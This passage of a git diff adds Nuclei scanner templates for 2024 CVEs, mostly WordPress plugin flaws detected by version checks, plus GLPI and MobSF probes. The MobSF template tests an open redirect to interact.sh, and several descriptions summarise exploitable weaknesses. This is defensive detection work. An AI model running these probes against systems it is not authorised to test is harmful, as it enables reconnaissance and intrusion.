contains(body,"\"success\":true") + condition: and + internal: true + + - raw: + - | + GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body,"name=\"_api_token\" value=\"{{randstr}}") + condition: and +# digest: 4a0a00473045022020f0a19516760d14ac31e8c84d369bd146dc1f1b33d511c3e3bf26bcb37cfd1302210084e13003f3f2992456369e3945bdc31357dd0766f831a8a1774715b870f405bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-41955.yaml b/nuclei-templates/CVE-2024/CVE-2024-41955.yaml new file mode 100644 index 0000000000..4142220925 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-41955.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-41955 + +info: + name: Open Redirect in Login Redirect - MobSF + author: Farish + severity: medium + description: | + Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. + reference: + - https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/fdaad81314f393d324c1ede79627e9d47986c8c8 + - https://nvd.nist.gov/vuln/detail/CVE-2024-41955 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41955 + - https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8m9j-2f32-2vx4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N + cvss-score: 5.2 + cve-id: CVE-2024-41955 + cwe-id: CWE-601 + metadata: + max-request: 1 + verified: true + vendor: mobsf + product: mobsf + fofa-query: "MobSF" + tags: cve,cve2024,open-redirect,mobsf,authenticated + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/?next=//interact.sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + host-redirects: true + matchers: + - type: regex + part: header_2 + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a0047304502210090e790d5c21cd2f15d0d1be88e6e9b04a4f1e6f766d5d0fd6d873aa935cbc044022051429030db205741e420088360a8ac69fdc068597c70c5739198ec79c48b61f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43919.yaml b/nuclei-templates/CVE-2024/CVE-2024-43919.yaml new file mode 100644 index 0000000000..1f7cfe4dd8 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43919.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43919 + +info: + name: > + YARPP <= 5.30.10 - Missing Authorization + author: topscoder + severity: high + description: > + The YARPP – Yet Another Related Posts Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.30.10. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89f57714-7643-4839-9932-7a2918dc7127?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43919 + metadata: + fofa-query: "wp-content/plugins/yet-another-related-posts-plugin/" + google-query: inurl:"/wp-content/plugins/yet-another-related-posts-plugin/" + shodan-query: 'vuln:CVE-2024-43919' + tags: cve,wordpress,wp-plugin,yet-another-related-posts-plugin,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/yet-another-related-posts-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "yet-another-related-posts-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.30.10') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43920.yaml b/nuclei-templates/CVE-2024/CVE-2024-43920.yaml new file mode 100644 index 0000000000..d7822cb6b2 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43920.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43920 + +info: + name: > + Gutenverse <= 1.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gutenverse plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8f40034-c868-4337-bf0a-385a961f9c35?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43920 + metadata: + fofa-query: "wp-content/plugins/gutenverse/" + google-query: inurl:"/wp-content/plugins/gutenverse/" + shodan-query: 'vuln:CVE-2024-43920' + tags: cve,wordpress,wp-plugin,gutenverse,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gutenverse/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gutenverse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43921.yaml b/nuclei-templates/CVE-2024/CVE-2024-43921.yaml new file mode 100644 index 0000000000..e1ef37be1c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43921.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43921 + +info: + name: > + Magic Post Thumbnail <= 5.2.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Generate Images – Magic Post Thumbnail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 5.2.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/440664ef-39c6-4b4b-99af-b9e6c9868a99?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43921 + metadata: + fofa-query: "wp-content/plugins/magic-post-thumbnail/" + google-query: inurl:"/wp-content/plugins/magic-post-thumbnail/" + shodan-query: 'vuln:CVE-2024-43921' + tags: cve,wordpress,wp-plugin,magic-post-thumbnail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/magic-post-thumbnail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "magic-post-thumbnail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43922.yaml b/nuclei-templates/CVE-2024/CVE-2024-43922.yaml new file mode 100644 index 0000000000..14a83ca3d3 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43922.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43922 + +info: + name: > + NitroPack <= 1.16.7 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The NitroPack – Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.16.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a0f539c-5d1d-4e1b-9a4b-719c096ba23c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-43922 + metadata: + fofa-query: "wp-content/plugins/nitropack/" + google-query: inurl:"/wp-content/plugins/nitropack/" + shodan-query: 'vuln:CVE-2024-43922' + tags: cve,wordpress,wp-plugin,nitropack,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nitropack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nitropack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.16.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43923.yaml b/nuclei-templates/CVE-2024/CVE-2024-43923.yaml new file mode 100644 index 0000000000..b128e1436c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43923.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43923 + +info: + name: > + Timetics <= 1.0.23 - Authorization Bypass + author: topscoder + severity: high + description: > + The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized booking in all versions up to, and including, 1.0.23. This is due to the plugin not properly validating if a user is authorized to make a booking. This makes it possible for unauthenticated attackers to book things they shouldn't be able to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6a75c8b0-fa1a-4032-a6fd-b504f5b05a08?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43923 + metadata: + fofa-query: "wp-content/plugins/timetics/" + google-query: inurl:"/wp-content/plugins/timetics/" + shodan-query: 'vuln:CVE-2024-43923' + tags: cve,wordpress,wp-plugin,timetics,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/timetics/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "timetics" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.23') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43924.yaml b/nuclei-templates/CVE-2024/CVE-2024-43924.yaml new file mode 100644 index 0000000000..b3d58b5cfd --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43924.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43924 + +info: + name: > + Responsive Lightbox <= 2.4.7 - Missing Authorization + author: topscoder + severity: high + description: > + The Responsive Lightbox plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init_builder() function in versions up to, and including, 2.4.7. This makes it possible for unauthenticated attackers to flush rules. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ead05d3-a5b1-474f-bc72-67570ff060da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43924 + metadata: + fofa-query: "wp-content/plugins/responsive-lightbox/" + google-query: inurl:"/wp-content/plugins/responsive-lightbox/" + shodan-query: 'vuln:CVE-2024-43924' + tags: cve,wordpress,wp-plugin,responsive-lightbox,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43925.yaml b/nuclei-templates/CVE-2024/CVE-2024-43925.yaml new file mode 100644 index 0000000000..181b2bfaa5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43925.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43925 + +info: + name: > + Envira Photo Gallery <= 1.8.14 - Missing Authorization + author: topscoder + severity: low + description: > + The Envira Photo Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the envira_gallery_ajax_load_gallery_data() function in versions up to, and including, 1.8.14. This makes it possible for authenticated attackers, with contributor-level access and above, to edit other users galleries. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/40906dea-6b9e-48ce-9e2b-64d1559cf8e2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43925 + metadata: + fofa-query: "wp-content/plugins/envira-gallery-lite/" + google-query: inurl:"/wp-content/plugins/envira-gallery-lite/" + shodan-query: 'vuln:CVE-2024-43925' + tags: cve,wordpress,wp-plugin,envira-gallery-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envira-gallery-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envira-gallery-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.14') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43926.yaml b/nuclei-templates/CVE-2024/CVE-2024-43926.yaml new file mode 100644 index 0000000000..7f0716ba1f --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43926.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43926 + +info: + name: > + Beaver Builder <= 2.8.3.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Beaver Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.8.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6aaa22f5-7304-4efc-9579-80ec053c2f7e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43926 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-43926' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43927.yaml b/nuclei-templates/CVE-2024/CVE-2024-43927.yaml new file mode 100644 index 0000000000..986a3b25f6 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43927.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43927 + +info: + name: > + Email Address Encoder <= 1.0.23 - Cross-Site Request Forgery via eae_clear_caches() + author: topscoder + severity: medium + description: > + The Email Address Encoder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.23. This is due to missing or incorrect nonce validation on the eae_clear_caches() function. This makes it possible for unauthenticated attackers to flush page caches via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f00ca075-cbf0-428b-a53b-dc723889f69b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43927 + metadata: + fofa-query: "wp-content/plugins/email-address-encoder/" + google-query: inurl:"/wp-content/plugins/email-address-encoder/" + shodan-query: 'vuln:CVE-2024-43927' + tags: cve,wordpress,wp-plugin,email-address-encoder,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/email-address-encoder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "email-address-encoder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.23') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43928.yaml b/nuclei-templates/CVE-2024/CVE-2024-43928.yaml new file mode 100644 index 0000000000..9b4d8c3cf6 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43928.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43928 + +info: + name: > + JobSearch <= 2.5.4 - Missing Authorization + author: topscoder + severity: low + description: > + The JobSearch plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f862afea-cd35-4aa4-aba6-df12a3728776?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43928 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43928' + tags: cve,wordpress,wp-plugin,wp-jobsearch,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43929.yaml b/nuclei-templates/CVE-2024/CVE-2024-43929.yaml new file mode 100644 index 0000000000..20a4617370 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43929.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43929 + +info: + name: > + JobSearch <= 2.5.4 - Missing Authorization + author: topscoder + severity: high + description: > + The JobSearch WP Job Board plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.5.4. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b58d905b-302e-47c3-8abb-354e7ff28a8f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43929 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43929' + tags: cve,wordpress,wp-plugin,wp-jobsearch,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43930.yaml b/nuclei-templates/CVE-2024/CVE-2024-43930.yaml new file mode 100644 index 0000000000..e89f103eac --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43930.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43930 + +info: + name: > + JobSearch <= 2.5.3 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The JobSearch plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8daa04cd-b61e-435f-9e10-3319949fdac7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43930 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43930' + tags: cve,wordpress,wp-plugin,wp-jobsearch,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43931.yaml b/nuclei-templates/CVE-2024/CVE-2024-43931.yaml new file mode 100644 index 0000000000..231b00e34b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43931.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43931 + +info: + name: > + JobSearch <= 2.5.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The JobSearch WP Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.5.3 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f70a3776-947f-4322-9e78-100475ed3d7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-43931 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43931' + tags: cve,wordpress,wp-plugin,wp-jobsearch,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43932.yaml b/nuclei-templates/CVE-2024/CVE-2024-43932.yaml new file mode 100644 index 0000000000..5a54674ccb --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43932.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43932 + +info: + name: > + The Plus Addons for Elementor Page Builder Lite <= 5.6.2 - Missing Authorization + author: topscoder + severity: low + description: > + The The Plus Addons for Elementor Page Builder Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in the /includes/plus-options/extension/cmb2-field-ajax-search.php file in versions up to, and including, 5.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to search for details they shouldn't have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78a5b2ab-4735-41b9-8807-8f98586cd3d7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43932 + metadata: + fofa-query: "wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/the-plus-addons-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-43932' + tags: cve,wordpress,wp-plugin,the-plus-addons-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-plus-addons-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43934.yaml b/nuclei-templates/CVE-2024/CVE-2024-43934.yaml new file mode 100644 index 0000000000..c80569b6df --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43934.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43934 + +info: + name: > + Collapsing Archives <= 3.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Collapsing Archives plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bdbd196-cb77-4042-86bb-7c67325c8c07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43934 + metadata: + fofa-query: "wp-content/plugins/collapsing-archives/" + google-query: inurl:"/wp-content/plugins/collapsing-archives/" + shodan-query: 'vuln:CVE-2024-43934' + tags: cve,wordpress,wp-plugin,collapsing-archives,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/collapsing-archives/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "collapsing-archives" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43935.yaml b/nuclei-templates/CVE-2024/CVE-2024-43935.yaml new file mode 100644 index 0000000000..17f86f31d6 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43935.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43935 + +info: + name: > + Delicious Recipes – WordPress 